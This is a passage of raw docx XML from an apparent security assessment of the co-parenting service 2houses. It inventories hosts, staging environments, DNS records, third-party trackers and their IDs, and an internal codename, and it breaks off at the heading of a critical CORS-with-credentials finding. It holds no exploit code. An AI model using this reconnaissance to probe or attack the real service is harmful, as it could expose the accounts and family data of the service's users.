              <w:t>Scaleway Dedibox, Paris (62.210.142.116)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1949"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Unknown</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1949"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="20"/>
                <w:shd w:val="clear" w:fill="F3F3F3"/>
              </w:rPr>
              <w:t>blog.2houses.com</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1949"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Blog / marketing</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1949"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>WordPress (suspected)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1949"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Cloudflare-fronted</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1949"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>WordPress</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1949"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="20"/>
                <w:shd w:val="clear" w:fill="F3F3F3"/>
              </w:rPr>
              <w:t>2housesblog.be</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1949"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Alt-TLD blog</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1949"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>WordPress</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1949"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>—</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1949"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>WordPress</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1949"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Staging</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="20"/>
                <w:shd w:val="clear" w:fill="F3F3F3"/>
              </w:rPr>
              <w:t>accounts-staging.2houses.com</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1949"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Staging auth</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1949"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Same Rails/Devise as prod</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1949"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>AWS Frankfurt</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1949"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Same codebase</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1949"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Staging</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="20"/>
                <w:shd w:val="clear" w:fill="F3F3F3"/>
              </w:rPr>
              <w:t>landing.staging.2houses.com</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1949"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Staging marketing</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1949"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>—</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1949"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>AWS CloudFront + Heroku</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1949"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>—</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Additional interesting DNS:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>accounts.staging.ldf.2houses.com</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — third "ldf" environment, resolves but unresponsive</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>tools.2houses.com</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — redirects to accounts.2houses.com for SSO login</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">TXT record: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>tools.staging=ec46e4a28e3459e517a4562fec816a54</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — probable Cloud66 domain-verification token for the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>tools-staging</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> variant</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Third-party services (all loaded client-side in authenticated sessions)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Intercom</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (support chat, session state)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Stripe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (payments)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Mixpanel</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (analytics, key </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>51d624988d899a818521b819f37c5bb5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Facebook Pixel</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (App ID </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>551481838222397</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Google Tag Manager / Ads / Analytics</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (GTM-54DR57)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Mouseflow</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (full session replay, project </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>17d3041b-cc09-4b3e-b4e6-21ff1fa7b1a1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">) — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>on the login page</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Axeptio</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (consent management)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Twitter / Apple SDKs</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>GoDaddy SSL seal</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>reCAPTCHA v2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> site key </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>6Ld_0LkUAAAAALUXFf0bzWyv9OEEzGmSMsIUC7om</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Sub-processor list in the privacy policy names: Stripe, OVH SAS, Google, AWS, Mandrill, Intercom — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Mouseflow is not disclosed</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Internal codename discovered</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>`_onehouse_session`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is the Rails session cookie on </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>tools.2houses.com</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>. The app's internal name is "OneHouse". "2houses" is the public brand; "onehouse" is the codebase.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Hidden form field </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>user[branding]=2houses</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> on the Devise sign-in page suggests the auth server is </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>multi-tenant white-label</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — OneHouse is probably sold to other co-parenting brands under different </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>branding</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> values. Worth enumerating (not done, would require experimentation).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="999999"/>
        </w:pBdr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="1F3A5F"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>Findings (detail)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Each has its own file under </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>findings/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>. Summary table:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>CRITICAL</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>F-003 — Reflective-origin CORS with credentials on `/api/v1/*`</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
